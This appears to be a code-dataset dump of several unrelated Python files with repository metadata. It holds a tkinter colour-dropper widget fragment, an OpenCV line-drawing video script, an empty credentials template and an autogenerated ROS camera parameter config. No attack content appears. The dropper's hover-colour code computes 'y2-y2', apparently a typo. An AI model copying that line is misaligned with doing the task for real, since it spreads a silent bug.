self.result = ttk.Variable()
def build_screenshot_canvas(self):
"""Build the screenshot canvas"""
self.screenshot_canvas = ttk.Canvas(
self.toplevel, cursor='tcross', autostyle=False)
self.screenshot_data = ImageGrab.grab()
self.screenshot_image = ImageTk.PhotoImage(self.screenshot_data)
self.screenshot_canvas.create_image(
0, 0, image=self.screenshot_image, anchor=NW)
self.screenshot_canvas.pack(fill=BOTH, expand=YES)
def build_zoom_toplevel(self, master):
"""Build the toplevel widget that shows the zoomed version of
the pixels underneath the mouse cursor."""
height = utility.scale_size(self.toplevel, 100)
width = utility.scale_size(self.toplevel, 100)
text_xoffset = utility.scale_size(self.toplevel, 50)
text_yoffset = utility.scale_size(self.toplevel, 50)
toplevel = ttk.Toplevel(master)
toplevel.transient(master)
if self.toplevel.winsys == 'x11':
toplevel.attributes('-type', 'tooltip')
else:
toplevel.overrideredirect(True)
toplevel.geometry(f'{width}x{height}')
toplevel.lift()
self.zoom_canvas = ttk.Canvas(
toplevel, borderwidth=1, height=self.zoom_height, width=self.zoom_width)
self.zoom_canvas.create_image(0, 0, tags=['image'], anchor=NW)
self.zoom_canvas.create_text(
text_xoffset, text_yoffset, text="+", fill="white", tags=['indicator'])
self.zoom_canvas.pack(fill=BOTH, expand=YES)
self.zoom_toplevel = toplevel
def on_mouse_wheel(self, event: tk.Event):
"""Zoom in and out on the image underneath the mouse
TODO Cross platform testing needed
"""
if self.toplevel.winsys.lower() == 'win32':
delta = -int(event.delta / 120)
elif self.toplevel.winsys.lower() == 'aqua':
delta = -event.delta
elif event.num == 4:
delta = -1
elif event.num == 5:
delta = 1
self.zoom_level += delta
self.on_mouse_motion()
def on_left_click(self, _):
"""Capture the color underneath the mouse cursor and destroy
the toplevel widget"""
# add logic here to capture the image color
hx = self.get_hover_color()
hsl = colorutils.color_to_hsl(hx)
rgb = colorutils.color_to_rgb(hx)
self.result.set(ColorChoice(rgb, hsl, hx))
self.toplevel.destroy()
self.zoom_toplevel.destroy()
self.toplevel.grab_release()
return self.result.get()
def on_right_click(self, _):
"""Close the color dropper without saving any color information"""
self.zoom_toplevel.destroy()
self.toplevel.grab_release()
self.toplevel.destroy()
def on_mouse_motion(self, event=None):
"""Callback for mouse motion"""
if event is None:
x, y = self.toplevel.winfo_pointerxy()
else:
x = event.x
y = event.y
# move snip window
self.zoom_toplevel.geometry(
f'+{x+self.zoom_xoffset}+{y+self.zoom_yoffset}')
# update the snip image
bbox = (x-self.zoom_level, y-self.zoom_level,
x+self.zoom_level+1, y+self.zoom_level+1)
size = (self.zoom_width, self.zoom_height)
self.zoom_data = self.screenshot_data.crop(
bbox).resize(size, Image.BOX)
self.zoom_image = ImageTk.PhotoImage(self.zoom_data)
self.zoom_canvas.itemconfig('image', image=self.zoom_image)
hover_color = self.get_hover_color()
contrast_color = colorutils.contrast_color(hover_color, 'hex')
self.zoom_canvas.itemconfig('indicator', fill=contrast_color)
def get_hover_color(self):
"""Get the color that is hovered over by the mouse cursor."""
x1, y1, x2, y2 = self.zoom_canvas.bbox('indicator')
x = x1 + (x2-x1)//2
y = y1 + (y2-y2)//2
r, g, b = self.zoom_data.getpixel((x, y))
hx = colorutils.color_to_hex((r, g, b))
return hx
def show(self):
"""Show the toplevel window"""
self.toplevel = ttk.Toplevel(alpha=1)
self.toplevel.wm_attributes('-fullscreen', True)
self.build_screenshot_canvas()
# event binding
self.toplevel.bind("<Motion>", self.on_mouse_motion, "+")
self.toplevel.bind("<Button-1>", self.on_left_click, "+")
self.toplevel.bind("<Button-3>", self.on_right_click, "+")
if self.toplevel.winsys.lower() == 'x11':
self.toplevel.bind("<Button-4>", self.on_mouse_wheel, "+")
self.toplevel.bind("<Button-5>", self.on_mouse_wheel, "+")
else:
self.toplevel.bind("<MouseWheel>", self.on_mouse_wheel, "+")
# initial snip setup
self.zoom_level = 2
self.zoom_toplevel: ttk.Toplevel = None
self.zoom_data = None
self.zoom_image = None
self.zoom_height = utility.scale_size(self.toplevel, 100)
self.zoom_width = utility.scale_size(self.toplevel, 100)
self.zoom_xoffset = utility.scale_size(self.toplevel, 10)
self.zoom_yoffset = utility.scale_size(self.toplevel, 10)
self.build_zoom_toplevel(self.toplevel)
self.toplevel.grab_set()
self.toplevel.lift('.')
self.zoom_toplevel.lift(self.toplevel)
self.on_mouse_motion()
| 78 | 0 | 27 |
0d1ec9c67649b422c7054d5aa5bb72e17cf3a3f7 | 534 | py | Python | line.py | srnthsrdhrn/VehicleTrackingGUI | a18d890176de7547d557dfe7cc18dd37afa37411 | [
"MIT"
] | null | null | null | line.py | srnthsrdhrn/VehicleTrackingGUI | a18d890176de7547d557dfe7cc18dd37afa37411 | [
"MIT"
] | null | null | null | line.py | srnthsrdhrn/VehicleTrackingGUI | a18d890176de7547d557dfe7cc18dd37afa37411 | [
"MIT"
] | 1 | 2020-01-13T08:43:57.000Z | 2020-01-13T08:43:57.000Z | import numpy as np
import cv2
#from sort.py import rama
import time
cap = cv2.VideoCapture('Night.mp4')
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('output.avi',fourcc, 20.0, (1280,720))
while(cap.isOpened()):
ret, frame = cap.read()
frame = cv2.line(frame, (100,360), (1200,360), (0,0,255), 6)
font = cv2.FONT_HERSHEY_SIMPLEX
frame = cv2.putText(frame, ('CAR'), (10,500), font, 4, (255,255,255),2,cv2.LINE_AA)
out.write(frame)
cv2.imshow('frame', frame)
if cv2.waitKey(25) == ord('q'):
break
| 21.36 | 84 | 0.664794 | import numpy as np
import cv2
#from sort.py import rama
import time
cap = cv2.VideoCapture('Night.mp4')
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('output.avi',fourcc, 20.0, (1280,720))
while(cap.isOpened()):
ret, frame = cap.read()
frame = cv2.line(frame, (100,360), (1200,360), (0,0,255), 6)
font = cv2.FONT_HERSHEY_SIMPLEX
frame = cv2.putText(frame, ('CAR'), (10,500), font, 4, (255,255,255),2,cv2.LINE_AA)
out.write(frame)
cv2.imshow('frame', frame)
if cv2.waitKey(25) == ord('q'):
break
| 0 | 0 | 0 |
c89b8c23db95676e8374607bed0fe07672faee3d | 176 | py | Python | passwords_template.py | Leibniz-HBI/RADICES | 37ce6303c646b9683c5a9c3159489d290bb16ade | [
"MIT"
] | 13 | 2019-07-18T15:28:02.000Z | 2022-01-03T15:16:06.000Z | passwords_template.py | manilevian/RADICES | 23d119c9c648dc07be4f39dc070b447f89e192f3 | [
"MIT"
] | 23 | 2019-07-12T15:43:27.000Z | 2021-12-15T14:41:11.000Z | passwords_template.py | manilevian/RADICES | 23d119c9c648dc07be4f39dc070b447f89e192f3 | [
"MIT"
] | 2 | 2020-05-05T10:22:50.000Z | 2020-08-31T11:10:07.000Z | sparsetwittermysqlpw = "" # mySQL Database Password
# Details for Mailgun
email_to_notify = ""
mailgun_default_smtp_login = ""
mailgun_api_base_url = ""
mailgun_api_key = ""
| 22 | 52 | 0.761364 | sparsetwittermysqlpw = "" # mySQL Database Password
# Details for Mailgun
email_to_notify = ""
mailgun_default_smtp_login = ""
mailgun_api_base_url = ""
mailgun_api_key = ""
| 0 | 0 | 0 |
7258cf2245b83f3ff9ff88e231ad10c39f43c719 | 19,502 | py | Python | RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/astra_camera/cfg/UVCCameraConfig.py | QianheYu/xtark_driver_dev | 1708888161cf20c0d1f45c99d0da4467d69c26c8 | [
"BSD-3-Clause"
] | 1 | 2022-03-11T03:31:15.000Z | 2022-03-11T03:31:15.000Z | RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/astra_camera/cfg/UVCCameraConfig.py | bravetree/xtark_driver_dev | 1708888161cf20c0d1f45c99d0da4467d69c26c8 | [
"BSD-3-Clause"
] | null | null | null | RasPi_Dev/ros_ws/devel/lib/python2.7/dist-packages/astra_camera/cfg/UVCCameraConfig.py | bravetree/xtark_driver_dev | 1708888161cf20c0d1f45c99d0da4467d69c26c8 | [
"BSD-3-Clause"
] | null | null | null | ## *********************************************************
##
## File autogenerated for the libuvc_camera package
## by the dynamic_reconfigure package.
## Please do not edit.
##
## ********************************************************/
from dynamic_reconfigure.encoding import extract_params
inf = float('inf')
config_description = {'upper': 'DEFAULT', 'lower': 'groups', 'srcline': 245, 'name': 'Default', 'parent': 0, 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'cstate': 'true', 'parentname': 'Default', 'class': 'DEFAULT', 'field': 'default', 'state': True, 'parentclass': '', 'groups': [], 'parameters': [{'srcline': 290, 'description': 'Vendor ID, hex digits (use camera of any vendor if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'vendor', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Product ID, hex digits (use camera of any model if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'product', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Serial number, arbitrary string (use camera of any serial number if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'serial', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Index into the list of cameras that match the above parameters.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'index', 'edit_method': '', 'default': 0, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image width.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'width', 'edit_method': '', 'default': 640, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image height.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'height', 'edit_method': '', 'default': 480, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Format of video stream from camera.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'video_mode', 'edit_method': "{'enum_description': 'Video stream format', 'enum': [{'srcline': 36, 'description': 'Use any uncompressed format', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'uncompressed', 'ctype': 'std::string', 'type': 'str', 'name': 'uncompressed'}, {'srcline': 37, 'description': 'User any compressed format', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'compressed', 'ctype': 'std::string', 'type': 'str', 'name': 'compressed'}, {'srcline': 38, 'description': 'YUYV', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'yuyv', 'ctype': 'std::string', 'type': 'str', 'name': 'yuyv'}, {'srcline': 39, 'description': 'UYVY', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'uyvy', 'ctype': 'std::string', 'type': 'str', 'name': 'uyvy'}, {'srcline': 40, 'description': 'RGB', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'rgb', 'ctype': 'std::string', 'type': 'str', 'name': 'rgb'}, {'srcline': 41, 'description': 'BGR', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'bgr', 'ctype': 'std::string', 'type': 'str', 'name': 'bgr'}, {'srcline': 42, 'description': 'MJPEG', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'mjpeg', 'ctype': 'std::string', 'type': 'str', 'name': 'mjpeg'}, {'srcline': 43, 'description': 'gray8', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'gray8', 'ctype': 'std::string', 'type': 'str', 'name': 'gray8'}]}", 'default': 'uncompressed', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Camera speed, frames per second.', 'max': 1000.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'frame_rate', 'edit_method': '', 'default': 15.0, 'level': 3, 'min': 0.1, 'type': 'double'}, {'srcline': 290, 'description': 'Method for determining the timestamp.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'timestamp_method', 'edit_method': "{'enum_description': 'Methods for determining the timestamp', 'enum': [{'srcline': 53, 'description': 'Time of publication', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'pub', 'ctype': 'std::string', 'type': 'str', 'name': 'PubTime'}, {'srcline': 54, 'description': 'Time when raw frame capture began', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'start', 'ctype': 'std::string', 'type': 'str', 'name': 'FrameStartTime'}, {'srcline': 55, 'description': 'Time when raw frame capture ended', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'stop', 'ctype': 'std::string', 'type': 'str', 'name': 'FrameStopTime'}, {'srcline': 56, 'description': 'Time when camera-to-host transfer completed', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const char * const', 'value': 'hostrcpt', 'ctype': 'std::string', 'type': 'str', 'name': 'HostReceiptTime'}]}", 'default': 'start', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'ROS tf frame of reference, resolved with tf_prefix unless absolute.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'frame_id', 'edit_method': '', 'default': 'camera', 'level': 0, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Path to camera calibration file.', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'camera_info_url', 'edit_method': '', 'default': '', 'level': 0, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Scanning mode.', 'max': 1, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'scanning_mode', 'edit_method': "{'enum_description': 'Scanning modes', 'enum': [{'srcline': 72, 'description': '', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Interlaced'}, {'srcline': 73, 'description': '', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Progressive'}]}", 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Auto exposure mode.', 'max': 3, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_exposure', 'edit_method': "{'enum_description': 'Auto-exposure modes', 'enum': [{'srcline': 80, 'description': 'Manual exposure, manual iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Manual'}, {'srcline': 81, 'description': 'Auto exposure, auto iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Auto'}, {'srcline': 82, 'description': 'manual exposure, auto iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 2, 'ctype': 'int', 'type': 'int', 'name': 'Shutter_Priority'}, {'srcline': 83, 'description': 'auto exposure, manual iris', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 3, 'ctype': 'int', 'type': 'int', 'name': 'Aperture_Priority'}]}", 'default': 3, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'In auto mode or shutter priority mode, allow the device to vary frame rate.', 'max': 1, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_exposure_priority', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Length of exposure, seconds.', 'max': 10.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'exposure_absolute', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0001, 'type': 'double'}, {'srcline': 290, 'description': 'Aperture, f.', 'max': 655.35, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'iris_absolute', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Maintain focus automatically.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_focus', 'edit_method': '', 'default': True, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Absolute focal distance, millimeters.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'focus_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Pan (clockwise), arc seconds.', 'max': 648000, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'pan_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -648000, 'type': 'int'}, {'srcline': 290, 'description': 'Tilt (up), arc seconds.', 'max': 648000, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'tilt_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -648000, 'type': 'int'}, {'srcline': 290, 'description': 'Roll (clockwise), degrees.', 'max': 180, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'roll_absolute', 'edit_method': '', 'default': 0, 'level': 0, 'min': -180, 'type': 'int'}, {'srcline': 290, 'description': 'Image capture disabled.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'privacy', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Backlight compensation, device-dependent (zero for none, increasing compensation above zero).', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'backlight_compensation', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Brightness, device dependent.', 'max': 32767, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'brightness', 'edit_method': '', 'default': 0, 'level': 0, 'min': -32768, 'type': 'int'}, {'srcline': 290, 'description': 'Contrast, device dependent.', 'max': 32767, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'contrast', 'edit_method': '', 'default': 0, 'level': 0, 'min': -32768, 'type': 'int'}, {'srcline': 290, 'description': 'Gain, device dependent.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'gain', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Power line frequency anti-flicker processing.', 'max': 2, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'power_line_frequency', 'edit_method': "{'enum_description': 'Power line frequency modes', 'enum': [{'srcline': 146, 'description': 'Disabled', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 0, 'ctype': 'int', 'type': 'int', 'name': 'Disabled'}, {'srcline': 147, 'description': '50 Hz', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Freq_50'}, {'srcline': 148, 'description': '60 Hz', 'srcfile': '/home/xtark/ros_ws/src/third_packages/ros_astra_camera/cfg/UVCCamera.cfg', 'cconsttype': 'const int', 'value': 1, 'ctype': 'int', 'type': 'int', 'name': 'Freq_60'}]}", 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Automatic hue control.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_hue', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'Hue, degrees.', 'max': 180.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'hue', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': -180.0, 'type': 'double'}, {'srcline': 290, 'description': 'Saturation, device dependent (zero for grayscale).', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'saturation', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image sharpness, device dependent.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'sharpness', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Gamma.', 'max': 5.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'gamma', 'edit_method': '', 'default': 1.0, 'level': 0, 'min': 0.01, 'type': 'double'}, {'srcline': 290, 'description': 'Automatic white balance.', 'max': True, 'cconsttype': 'const bool', 'ctype': 'bool', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'auto_white_balance', 'edit_method': '', 'default': False, 'level': 0, 'min': False, 'type': 'bool'}, {'srcline': 290, 'description': 'White balance temperature, degrees.', 'max': 65536, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_temperature', 'edit_method': '', 'default': 0, 'level': 0, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Blue or U component of white balance, device-dependent.', 'max': 65536.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_BU', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}, {'srcline': 290, 'description': 'Red or V component of white balance, device-dependent.', 'max': 65536.0, 'cconsttype': 'const double', 'ctype': 'double', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'white_balance_RV', 'edit_method': '', 'default': 0.0, 'level': 0, 'min': 0.0, 'type': 'double'}], 'type': '', 'id': 0}
min = {}
max = {}
defaults = {}
level = {}
type = {}
all_level = 0
#def extract_params(config):
# params = []
# params.extend(config['parameters'])
# for group in config['groups']:
# params.extend(extract_params(group))
# return params
for param in extract_params(config_description):
min[param['name']] = param['min']
max[param['name']] = param['max']
defaults[param['name']] = param['default']
level[param['name']] = param['level']
type[param['name']] = param['type']
all_level = all_level | param['level']
UVCCamera_uncompressed = 'uncompressed'
UVCCamera_compressed = 'compressed'
UVCCamera_yuyv = 'yuyv'
UVCCamera_uyvy = 'uyvy'
UVCCamera_rgb = 'rgb'
UVCCamera_bgr = 'bgr'
UVCCamera_mjpeg = 'mjpeg'
UVCCamera_gray8 = 'gray8'
UVCCamera_PubTime = 'pub'
UVCCamera_FrameStartTime = 'start'
UVCCamera_FrameStopTime = 'stop'
UVCCamera_HostReceiptTime = 'hostrcpt'
UVCCamera_Interlaced = 0
UVCCamera_Progressive = 1
UVCCamera_Manual = 0
UVCCamera_Auto = 1
UVCCamera_Shutter_Priority = 2
UVCCamera_Aperture_Priority = 3
UVCCamera_Disabled = 0
UVCCamera_Freq_50 = 1
UVCCamera_Freq_60 = 1
| 336.241379 | 18,051 | 0.677879 | ## *********************************************************
##
## File autogenerated for the libuvc_camera package
## by the dynamic_reconfigure package.
## Please do not edit.
##
## ********************************************************/
from dynamic_reconfigure.encoding import extract_params
inf = float('inf')
config_description = {'upper': 'DEFAULT', 'lower': 'groups', 'srcline': 245, 'name': 'Default', 'parent': 0, 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'cstate': 'true', 'parentname': 'Default', 'class': 'DEFAULT', 'field': 'default', 'state': True, 'parentclass': '', 'groups': [], 'parameters': [{'srcline': 290, 'description': 'Vendor ID, hex digits (use camera of any vendor if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'vendor', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Product ID, hex digits (use camera of any model if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'product', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Serial number, arbitrary string (use camera of any serial number if null).', 'max': '', 'cconsttype': 'const char * const', 'ctype': 'std::string', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'serial', 'edit_method': '', 'default': '', 'level': 3, 'min': '', 'type': 'str'}, {'srcline': 290, 'description': 'Index into the list of cameras that match the above parameters.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': '/opt/ros/kinetic/lib/python2.7/dist-packages/dynamic_reconfigure/parameter_generator_catkin.py', 'name': 'index', 'edit_method': '', 'default': 0, 'level': 3, 'min': 0, 'type': 'int'}, {'srcline': 290, 'description': 'Image width.', 'max': 2147483647, 'cconsttype': 'const int', 'ctype': 'int', 'srcfile': 